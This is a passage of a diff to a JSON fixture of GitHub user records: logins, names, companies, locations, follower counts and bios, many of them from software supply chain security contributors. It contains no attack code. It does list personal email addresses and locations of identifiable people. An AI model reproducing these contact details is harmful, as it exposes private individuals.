"collaborators_count": 0, - "following_count": 21, - "followers_count": 37, + "following_count": 5, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 122, - "created_at": "2014-06-06T14:57:37Z", - "updated_at": "2024-04-11T15:07:20Z", - "node_id": "MDQ6VXNlcjc4MTY3MTU=", - "bio": "STSM, Open Source Supply Chain Security (OSSCS)", + "public_repositories_count": 3, + "created_at": "2022-07-18T15:01:40Z", + "updated_at": "2024-07-05T16:46:39Z", + "node_id": "U_kgDOBodjhg", + "bio": "Software Engineer", "is_hireable": false, - "twitter_username": "mattrutkowski91" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1164, + "pk": 6425, "fields": { - "nest_created_at": "2024-09-11T22:54:09.007Z", - "nest_updated_at": "2024-09-11T22:54:09.007Z", + "nest_created_at": "2024-09-22T07:43:30.841Z", + "nest_updated_at": "2024-09-22T18:49:00.575Z", "name": "", - "login": "VladimirBoiko", + "login": "coderpatros-admin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17159937?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/98200781?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-02-10T12:15:15Z", - "updated_at": "2021-07-28T12:19:30Z", - "node_id": "MDQ6VXNlcjE3MTU5OTM3", + "public_repositories_count": 0, + "created_at": "2022-01-22T04:09:19Z", + "updated_at": "2024-09-16T03:37:03Z", + "node_id": "U_kgDOBdpszQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389353,24 +646552,24 @@ }, { "model": "github.user", - "pk": 1165, + "pk": 6426, "fields": { - "nest_created_at": "2024-09-11T22:54:09.815Z", - "nest_updated_at": "2024-09-11T22:54:09.815Z", - "name": "", - "login": "tomekkolo", + "nest_created_at": "2024-09-22T07:43:42.289Z", + "nest_updated_at": "2024-09-22T18:46:13.725Z", + "name": "Tim Pickles", + "login": "snyk-tim", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38069337?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/93527968?v=4", + "company": "Snyk", + "location": "London", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2018-04-04T09:37:38Z", - "updated_at": "2024-05-22T16:36:48Z", - "node_id": "MDQ6VXNlcjM4MDY5MzM3", + "public_repositories_count": 4, + "created_at": "2021-11-01T12:48:33Z", + "updated_at": "2024-07-29T14:02:01Z", + "node_id": "U_kgDOBZMfoA", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389378,49 +646577,99 @@ }, { "model": "github.user", - "pk": 1166, + "pk": 6427, "fields": { - "nest_created_at": "2024-09-11T22:54:10.641Z", - "nest_updated_at": "2024-09-18T18:55:43.890Z", - "name": "vivek kumar sahu", - "login": "viveksahu26", - "email": "vivekkumarsahu650@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/65091408?v=4", - "company": "Open Source Developer", - "location": "Indore", + "nest_created_at": "2024-09-22T07:43:42.918Z", + "nest_updated_at": "2024-09-22T18:46:14.347Z", + "name": "Christian Köberl", + "login": "derkoe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/123199?v=4", + "company": "Porsche Informatik @porscheinformatik", + "location": "Salzburg, Austria", "collaborators_count": 0, - "following_count": 80, - "followers_count": 12, + "following_count": 2, + "followers_count": 77, "public_gists_count": 2, - "public_repositories_count": 83, - "created_at": "2020-05-09T20:26:17Z", - "updated_at": "2024-09-16T16:11:23Z", - "node_id": "MDQ6VXNlcjY1MDkxNDA4", - "bio": " :heart: open source | Working on Software Supply Chain Security @interlynk-io | Ex-Contributor @kyverno | Golang", + "public_repositories_count": 216, + "created_at": "2009-09-04T11:24:45Z", + "updated_at": "2024-09-11T05:57:33Z", + "node_id": "MDQ6VXNlcjEyMzE5OQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "derkoe" + } +}, +{ + "model": "github.user", + "pk": 6428, + "fields": { + "nest_created_at": "2024-09-22T07:43:43.231Z", + "nest_updated_at": "2024-09-22T18:46:14.661Z", + "name": "John Speed Meyers", + "login": "jspeed-meyers", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/54914994?v=4", + "company": "@chainguard-dev", + "location": "Virginia, USA", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 49, + "public_gists_count": 27, + "public_repositories_count": 46, + "created_at": "2019-09-04T20:56:09Z", + "updated_at": "2024-07-16T18:08:47Z", + "node_id": "MDQ6VXNlcjU0OTE0OTk0", + "bio": "Head of Chainguard Labs. Likes: open source software security, software supply chain security, @wolfi-dev", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6429, + "fields": { + "nest_created_at": "2024-09-22T07:43:43.557Z", + "nest_updated_at": "2024-09-22T18:46:14.972Z", + "name": "Justin Abrahms", + "login": "justinabrahms", + "email": "justin@abrah.ms", + "avatar_url": "https://avatars.githubusercontent.com/u/3853?v=4", + "company": "Thrive Market", + "location": "Portland, OR", + "collaborators_count": 0, + "following_count": 98, + "followers_count": 598, + "public_gists_count": 66, + "public_repositories_count": 94, + "created_at": "2008-03-26T01:32:23Z", + "updated_at": "2024-09-13T17:57:40Z", + "node_id": "MDQ6VXNlcjM4NTM=", + "bio": "", "is_hireable": false, - "twitter_username": "viveksahu_26" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1167, + "pk": 6430, "fields": { - "nest_created_at": "2024-09-11T22:54:24.473Z", - "nest_updated_at": "2024-09-12T01:25:15.230Z", - "name": "Michele", - "login": "mvanini", + "nest_created_at": "2024-09-22T07:43:44.185Z", + "nest_updated_at": "2024-09-22T18:46:15.603Z", + "name": "Matthieu MOREL", + "login": "mmorel-35", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15686067?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6032561?v=4", "company": "", - "location": "Italy", + "location": "France", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 10, - "created_at": "2015-11-06T09:18:50Z", - "updated_at": "2024-09-10T08:27:54Z", - "node_id": "MDQ6VXNlcjE1Njg2MDY3", + "followers_count": 0, + "public_gists_count": 4, + "public_repositories_count": 171, + "created_at": "2013-11-25T16:07:03Z", + "updated_at": "2024-09-22T17:36:23Z", + "node_id": "MDQ6VXNlcjYwMzI1NjE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389428,149 +646677,149 @@ }, { "model": "github.user", - "pk": 1168, + "pk": 6431, "fields": { - "nest_created_at": "2024-09-11T22:54:25.323Z", - "nest_updated_at": "2024-09-12T01:27:15.895Z", - "name": "SR", - "login": "navulirs", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4923947?v=4", + "nest_created_at": "2024-09-22T07:43:44.813Z", + "nest_updated_at": "2024-09-22T18:46:16.232Z", + "name": "chenk", + "login": "chen-keinan", + "email": "hen.keinan@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9782393?v=4", "company": "", - "location": "", + "location": "Global", "collaborators_count": 0, - "following_count": 26, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 60, - "created_at": "2013-07-02T19:09:40Z", - "updated_at": "2024-07-11T22:03:30Z", - "node_id": "MDQ6VXNlcjQ5MjM5NDc=", - "bio": "A Nomad!!", - "is_hireable": true, - "twitter_username": "" + "following_count": 2, + "followers_count": 59, + "public_gists_count": 1, + "public_repositories_count": 97, + "created_at": "2014-11-16T10:42:55Z", + "updated_at": "2024-09-13T12:24:56Z", + "node_id": "MDQ6VXNlcjk3ODIzOTM=", + "bio": "☠️ Security ⋆ 🔧 Engineering ⋆ 🐧 Open Source", + "is_hireable": false, + "twitter_username": "ChenKeinan" } }, { "model": "github.user", - "pk": 1169, + "pk": 6432, "fields": { - "nest_created_at": "2024-09-11T22:54:26.147Z", - "nest_updated_at": "2024-09-12T03:16:19.957Z", - "name": "Bozidar Spirovski", - "login": "spirovskib", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/14974055?v=4", - "company": "BeyondMachines", - "location": "", + "nest_created_at": "2024-09-22T07:43:50.249Z", + "nest_updated_at": "2024-09-22T18:46:22.005Z", + "name": "Alexey Vishnyakov", + "login": "SweetVishnya", + "email": "pmvishnya@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/22149206?v=4", + "company": "@yandex-cloud", + "location": "Moscow, Russia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 59, + "followers_count": 71, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2015-10-05T08:09:20Z", - "updated_at": "2024-08-31T16:02:57Z", - "node_id": "MDQ6VXNlcjE0OTc0MDU1", - "bio": "Building Strong Cybersecurity in SaaS and Startups | Developing Successful Teams | Mentoring Young Engineers | Coding various ideas (probably badly)", + "public_repositories_count": 41, + "created_at": "2016-09-12T12:26:35Z", + "updated_at": "2024-09-14T20:17:23Z", + "node_id": "MDQ6VXNlcjIyMTQ5MjA2", + "bio": "PhD in computer security", "is_hireable": false, - "twitter_username": "spirovskib" + "twitter_username": "VishnyaSweet" } }, { "model": "github.user", - "pk": 1170, + "pk": 6433, "fields": { - "nest_created_at": "2024-09-11T22:54:27.004Z", - "nest_updated_at": "2024-09-11T22:54:27.004Z", - "name": "David", - "login": "dmuse89", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9056454?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:43:50.558Z", + "nest_updated_at": "2024-09-22T18:46:22.333Z", + "name": "Batuhan Apaydın", + "login": "developer-guy", + "email": "developerguyn@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/16693043?v=4", + "company": "@trendyol", + "location": "compromised", "collaborators_count": 0, - "following_count": 0, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2014-10-07T18:38:48Z", - "updated_at": "2024-01-05T10:34:05Z", - "node_id": "MDQ6VXNlcjkwNTY0NTQ=", - "bio": "IT-Security Engineer. Technical Editor.", + "following_count": 1699, + "followers_count": 865, + "public_gists_count": 188, + "public_repositories_count": 578, + "created_at": "2016-01-13T22:01:59Z", + "updated_at": "2024-08-11T17:40:48Z", + "node_id": "MDQ6VXNlcjE2NjkzMDQz", + "bio": "🚀CNCF Ambassador 23 🎖Best Sigstore Evangelist 23 🐳Docker Captain 23 ✍️ CDF Ambassador 23 \r\n📅 Organizer at DevOpsTr • @cloudnativetr", "is_hireable": false, - "twitter_username": "" + "twitter_username": "developerguyba" } }, { "model": "github.user", - "pk": 1171, + "pk": 6434, "fields": { - "nest_created_at": "2024-09-11T22:54:28.638Z", - "nest_updated_at": "2024-09-11T22:54:28.638Z", - "name": "Thiéfaine Mercier", - "login": "ThiefaineM", + "nest_created_at": "2024-09-22T07:43:50.867Z", + "nest_updated_at": "2024-09-22T18:46:22.652Z", + "name": "Jan Hensel", + "login": "ja-he", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/81707210?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/63857598?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 37, + "followers_count": 17, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-03-31T17:34:05Z", - "updated_at": "2024-03-02T13:29:39Z", - "node_id": "MDQ6VXNlcjgxNzA3MjEw", - "bio": "", + "public_repositories_count": 29, + "created_at": "2020-04-17T13:07:11Z", + "updated_at": "2024-09-15T10:26:45Z", + "node_id": "MDQ6VXNlcjYzODU3NTk4", + "bio": "Computer Science student working toward my masters degree (working part time, programming/pentesting).\r\n\r\nI like Linux, [n]vim; Go, C++, Rust; lots more :^)", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1172, + "pk": 6435, "fields": { - "nest_created_at": "2024-09-11T22:54:29.451Z", - "nest_updated_at": "2024-09-12T00:28:06.168Z", - "name": "Craig Andrews", - "login": "candrews", - "email": "candrews@integralblue.com", - "avatar_url": "https://avatars.githubusercontent.com/u/194713?v=4", + "nest_created_at": "2024-09-22T07:43:51.493Z", + "nest_updated_at": "2024-09-22T20:24:09.196Z", + "name": "Neil Naveen", + "login": "neilnaveen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42328488?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 85, + "following_count": 2, + "followers_count": 18, "public_gists_count": 2, - "public_repositories_count": 260, - "created_at": "2010-02-02T18:48:08Z", - "updated_at": "2024-09-04T11:19:29Z", - "node_id": "MDQ6VXNlcjE5NDcxMw==", - "bio": "https://candrews.integralblue.com", + "public_repositories_count": 62, + "created_at": "2018-08-13T01:09:13Z", + "updated_at": "2024-09-12T14:49:32Z", + "node_id": "MDQ6VXNlcjQyMzI4NDg4", + "bio": "10th grader, Creator of @bitbomdev and Maintainer of @gittuf\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1173, + "pk": 6436, "fields": { - "nest_created_at": "2024-09-11T22:54:30.305Z", - "nest_updated_at": "2024-09-12T00:28:56.521Z", - "name": "", - "login": "2013kaa", + "nest_created_at": "2024-09-22T07:43:58.914Z", + "nest_updated_at": "2024-09-22T18:46:30.560Z", + "name": "gradle-update-robot", + "login": "gradle-update-robot", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46608135?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/71028193?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 15, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2019-01-11T18:52:34Z", - "updated_at": "2024-07-08T19:30:23Z", - "node_id": "MDQ6VXNlcjQ2NjA4MTM1", + "public_repositories_count": 0, + "created_at": "2020-09-09T15:39:30Z", + "updated_at": "2021-01-13T10:35:18Z", + "node_id": "MDQ6VXNlcjcxMDI4MTkz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389578,24 +646827,24 @@ }, { "model": "github.user", - "pk": 1174, + "pk": 6437, "fields": { - "nest_created_at": "2024-09-11T22:54:41.559Z", - "nest_updated_at": "2024-09-11T22:54:41.559Z", - "name": "", - "login": "anujeyaraj", + "nest_created_at": "2024-09-22T07:43:59.534Z", + "nest_updated_at": "2024-09-22T18:48:20.445Z", + "name": "Richard Lee", + "login": "llamahunter", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/36725181?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/843173?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2018-02-22T07:18:38Z", - "updated_at": "2022-08-22T15:38:50Z", - "node_id": "MDQ6VXNlcjM2NzI1MTgx", + "followers_count": 10, + "public_gists_count": 2, + "public_repositories_count": 25, + "created_at": "2011-06-10T23:28:07Z", + "updated_at": "2024-08-19T16:11:33Z", + "node_id": "MDQ6VXNlcjg0MzE3Mw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389603,24 +646852,24 @@ }, { "model": "github.user", - "pk": 1175, + "pk": 6438, "fields": { - "nest_created_at": "2024-09-11T22:54:44.899Z", - "nest_updated_at": "2024-09-16T22:28:39.226Z", + "nest_created_at": "2024-09-22T07:44:00.159Z", + "nest_updated_at": "2024-09-22T18:46:31.836Z", "name": "", - "login": "g-sahil22", + "login": "emirmx", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/100830439?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/53853302?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-03-03T07:23:11Z", - "updated_at": "2024-04-23T09:13:13Z", - "node_id": "U_kgDOBgKM5w", + "public_repositories_count": 3, + "created_at": "2019-08-07T07:00:57Z", + "updated_at": "2024-09-19T07:45:21Z", + "node_id": "MDQ6VXNlcjUzODUzMzAy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389628,24 +646877,24 @@ }, { "model": "github.user", - "pk": 1176, + "pk": 6439, "fields": { - "nest_created_at": "2024-09-11T22:54:45.718Z", - "nest_updated_at": "2024-09-11T22:54:45.718Z", - "name": "Chris Fort", - "login": "37b", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17730030?v=4", - "company": "LexisNexis", - "location": "Apex, NC", + "nest_created_at": "2024-09-22T07:44:00.472Z", + "nest_updated_at": "2024-09-22T19:42:11.306Z", + "name": "Jesper Skov", + "login": "jskov-jyskebank-dk", + "email": "jskov@jyskebank.dk", + "avatar_url": "https://avatars.githubusercontent.com/u/8705199?v=4", + "company": "Jyske Bank", + "location": "Silkeborg, Denmark", "collaborators_count": 0, - "following_count": 6, + "following_count": 0, "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2016-03-08T18:59:08Z", - "updated_at": "2024-05-03T17:24:56Z", - "node_id": "MDQ6VXNlcjE3NzMwMDMw", + "public_repositories_count": 19, + "created_at": "2014-09-09T05:43:30Z", + "updated_at": "2024-08-28T07:47:46Z", + "node_id": "MDQ6VXNlcjg3MDUxOTk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389653,124 +646902,124 @@ }, { "model": "github.user", - "pk": 1177, + "pk": 6440, "fields": { - "nest_created_at": "2024-09-11T22:54:46.534Z", - "nest_updated_at": "2024-09-11T23:08:33.835Z", - "name": "Ajmal Kottilingal", - "login": "ajmalab", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/90693406?v=4", - "company": "Wise", - "location": "London", + "nest_created_at": "2024-09-22T07:44:01.784Z", + "nest_updated_at": "2024-09-22T18:46:33.448Z", + "name": "Loïc Rouchon", + "login": "loicrouchon", + "email": "loic@loicrouchon.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1785348?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2021-09-14T11:17:08Z", - "updated_at": "2024-09-04T16:22:54Z", - "node_id": "MDQ6VXNlcjkwNjkzNDA2", - "bio": "", + "following_count": 1, + "followers_count": 12, + "public_gists_count": 22, + "public_repositories_count": 18, + "created_at": "2012-05-28T11:33:24Z", + "updated_at": "2024-08-13T14:59:53Z", + "node_id": "MDQ6VXNlcjE3ODUzNDg=", + "bio": "Software Development Enthusiast", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1178, + "pk": 6441, "fields": { - "nest_created_at": "2024-09-11T22:54:48.598Z", - "nest_updated_at": "2024-09-11T22:54:48.598Z", - "name": "Marius Giesenkirchen", - "login": "mariusgiesen", + "nest_created_at": "2024-09-22T07:44:02.414Z", + "nest_updated_at": "2024-09-22T18:46:34.085Z", + "name": "Phill Garrett", + "login": "gitphill", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46571744?v=4", - "company": "Storm Reply GmbH", - "location": "Dortmund, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/6598617?v=4", + "company": "Snyk", + "location": "UK", "collaborators_count": 0, - "following_count": 6, - "followers_count": 3, + "following_count": 3, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-01-10T16:49:25Z", - "updated_at": "2024-06-27T09:14:17Z", - "node_id": "MDQ6VXNlcjQ2NTcxNzQ0", - "bio": "", + "public_repositories_count": 7, + "created_at": "2014-02-05T20:19:59Z", + "updated_at": "2024-07-30T07:28:58Z", + "node_id": "MDQ6VXNlcjY1OTg2MTc=", + "bio": "Staff Software Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1179, + "pk": 6442, "fields": { - "nest_created_at": "2024-09-11T22:54:49.422Z", - "nest_updated_at": "2024-09-11T22:54:49.422Z", - "name": "Abdulmalik Salawu", - "login": "saintmalik", + "nest_created_at": "2024-09-22T07:44:03.054Z", + "nest_updated_at": "2024-09-22T18:46:34.737Z", + "name": "Bert Roos", + "login": "Bert-R", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37118134?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7149792?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 19, - "followers_count": 105, - "public_gists_count": 6, - "public_repositories_count": 26, - "created_at": "2018-03-06T17:20:14Z", - "updated_at": "2024-08-29T13:49:51Z", - "node_id": "MDQ6VXNlcjM3MTE4MTM0", - "bio": "minimalist", + "following_count": 0, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 58, + "created_at": "2014-04-03T12:03:07Z", + "updated_at": "2024-04-17T14:14:50Z", + "node_id": "MDQ6VXNlcjcxNDk3OTI=", + "bio": "", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1180, + "pk": 6443, "fields": { - "nest_created_at": "2024-09-11T22:54:51.870Z", - "nest_updated_at": "2024-09-12T01:42:49.236Z", - "name": "Robert Grant", - "login": "robertlagrant", + "nest_created_at": "2024-09-22T07:44:03.364Z", + "nest_updated_at": "2024-09-22T18:46:35.060Z", + "name": "", + "login": "flashfishgit", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1766161?v=4", - "company": "Oxford Nanopore Technologies", - "location": "Oxford", + "avatar_url": "https://avatars.githubusercontent.com/u/102473074?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 7, - "public_gists_count": 2, - "public_repositories_count": 47, - "created_at": "2012-05-22T17:16:32Z", - "updated_at": "2024-09-03T17:13:53Z", - "node_id": "MDQ6VXNlcjE3NjYxNjE=", + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-03-27T14:03:27Z", + "updated_at": "2024-09-19T16:16:44Z", + "node_id": "U_kgDOBhudcg", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1181, + "pk": 6444, "fields": { - "nest_created_at": "2024-09-11T22:54:53.101Z", - "nest_updated_at": "2024-09-11T22:54:53.884Z", + "nest_created_at": "2024-09-22T07:44:03.684Z", + "nest_updated_at": "2024-09-22T18:46:35.366Z", "name": "", - "login": "crusy", + "login": "fgunbin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6871303?v=4", - "company": "@Draegerwerk", + "avatar_url": "https://avatars.githubusercontent.com/u/8119086?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, - "public_gists_count": 4, - "public_repositories_count": 4, - "created_at": "2014-03-06T09:32:04Z", - "updated_at": "2024-07-26T10:44:02Z", - "node_id": "MDQ6VXNlcjY4NzEzMDM=", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2014-07-09T23:36:13Z", + "updated_at": "2022-09-06T15:57:02Z", + "node_id": "MDQ6VXNlcjgxMTkwODY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389778,24 +647027,24 @@ }, { "model": "github.user", - "pk": 1182, + "pk": 6445, "fields": { - "nest_created_at": "2024-09-11T22:54:54.692Z", - "nest_updated_at": "2024-09-11T22:54:54.692Z", + "nest_created_at": "2024-09-22T07:44:04.031Z", + "nest_updated_at": "2024-09-22T19:42:06.173Z", "name": "", - "login": "thewuffel", + "login": "S-Callier", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/84853379?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/10719800?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-05-26T13:01:34Z", - "updated_at": "2023-08-08T04:43:57Z", - "node_id": "MDQ6VXNlcjg0ODUzMzc5", + "public_repositories_count": 10, + "created_at": "2015-01-27T04:32:31Z", + "updated_at": "2021-12-16T05:42:06Z", + "node_id": "MDQ6VXNlcjEwNzE5ODAw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389803,24 +647052,24 @@ }, { "model": "github.user", - "pk": 1183, + "pk": 6446, "fields": { - "nest_created_at": "2024-09-11T22:54:55.517Z", - "nest_updated_at": "2024-09-12T01:27:27.296Z", - "name": "Aleksandr Gadai", - "login": "alexgadai", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9041444?v=4", - "company": "", - "location": "Moscow, Russia", + "nest_created_at": "2024-09-22T07:44:04.350Z", + "nest_updated_at": "2024-09-22T18:49:22.853Z", + "name": "Behnaz Hassanshahi", + "login": "behnazh-w", + "email": "behnaz.hassanshahi@oracle.com", + "avatar_url": "https://avatars.githubusercontent.com/u/27933054?v=4", + "company": "@Oracle", + "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 4, + "following_count": 8, + "followers_count": 24, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2014-10-06T19:37:56Z", - "updated_at": "2024-08-17T07:42:27Z", - "node_id": "MDQ6VXNlcjkwNDE0NDQ=", + "public_repositories_count": 18, + "created_at": "2017-04-24T00:23:33Z", + "updated_at": "2024-06-11T01:01:34Z", + "node_id": "MDQ6VXNlcjI3OTMzMDU0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389828,24 +647077,24 @@ }, { "model": "github.user", - "pk": 1184, + "pk": 6447, "fields": { - "nest_created_at": "2024-09-11T22:54:56.360Z", - "nest_updated_at": "2024-09-12T01:33:38.269Z", - "name": "", - "login": "rashmimehta300", + "nest_created_at": "2024-09-22T07:44:04.989Z", + "nest_updated_at": "2024-09-22T18:46:36.637Z", + "name": "Sebastian Lauth", + "login": "gcx-seb", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/129749381?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/98963862?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-04-03T11:18:09Z", - "updated_at": "2024-05-08T07:58:07Z", - "node_id": "U_kgDOB7vRhQ", + "public_repositories_count": 3, + "created_at": "2022-02-03T14:28:25Z", + "updated_at": "2024-08-03T18:19:05Z", + "node_id": "U_kgDOBeYRlg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389853,74 +647102,74 @@ }, { "model": "github.user", - "pk": 1185, + "pk": 6448, "fields": { - "nest_created_at": "2024-09-11T22:54:57.164Z", - "nest_updated_at": "2024-09-18T18:55:48.132Z", - "name": "Kito D. Mann", - "login": "kito99", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3187538?v=4", - "company": "Virtua, Inc.", - "location": "Glen Allen, VA", + "nest_created_at": "2024-09-22T07:44:05.929Z", + "nest_updated_at": "2024-09-22T18:46:37.570Z", + "name": "Kristóf Koncz", + "login": "kkristof93", + "email": "konczkristof93@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6718740?v=4", + "company": "", + "location": "Budapest, HU", "collaborators_count": 0, - "following_count": 12, - "followers_count": 51, + "following_count": 3, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 66, - "created_at": "2013-01-04T18:00:54Z", - "updated_at": "2024-02-13T20:16:10Z", - "node_id": "MDQ6VXNlcjMxODc1Mzg=", - "bio": "Architecture, training, development, and mentoring with Jakarta EE, JSF, Web Components, Microservices, etc.", - "is_hireable": true, - "twitter_username": "kito99" + "public_repositories_count": 8, + "created_at": "2014-02-18T17:48:06Z", + "updated_at": "2024-05-22T16:28:19Z", + "node_id": "MDQ6VXNlcjY3MTg3NDA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1186, + "pk": 6449, "fields": { - "nest_created_at": "2024-09-11T22:55:01.376Z", - "nest_updated_at": "2024-09-11T22:55:01.376Z", - "name": "Igor Savin", - "login": "kibertoad", - "email": "iselwin@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1847934?v=4", + "nest_created_at": "2024-09-22T07:44:06.238Z", + "nest_updated_at": "2024-09-22T18:46:37.884Z", + "name": "", + "login": "zkstchhh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/165038306?v=4", "company": "", - "location": "Vilnius", + "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 340, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 160, - "created_at": "2012-06-13T20:26:45Z", - "updated_at": "2024-08-12T10:29:22Z", - "node_id": "MDQ6VXNlcjE4NDc5MzQ=", - "bio": "Principal engineer at @lokalise.\r\nLead maintainer of @knex ", + "public_repositories_count": 1, + "created_at": "2024-03-26T13:16:38Z", + "updated_at": "2024-03-26T13:16:38Z", + "node_id": "U_kgDOCdZI4g", + "bio": "", "is_hireable": false, - "twitter_username": "kibertoad" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1187, + "pk": 6450, "fields": { - "nest_created_at": "2024-09-11T22:55:08.549Z", - "nest_updated_at": "2024-09-11T22:55:09.384Z", - "name": "", - "login": "Kasyap-R", + "nest_created_at": "2024-09-22T07:44:06.563Z", + "nest_updated_at": "2024-09-22T19:42:00.396Z", + "name": "gerg", + "login": "angrylogic", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/122060735?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4575020?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, + "following_count": 7, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 29, - "created_at": "2023-01-05T22:44:15Z", - "updated_at": "2024-08-04T20:11:32Z", - "node_id": 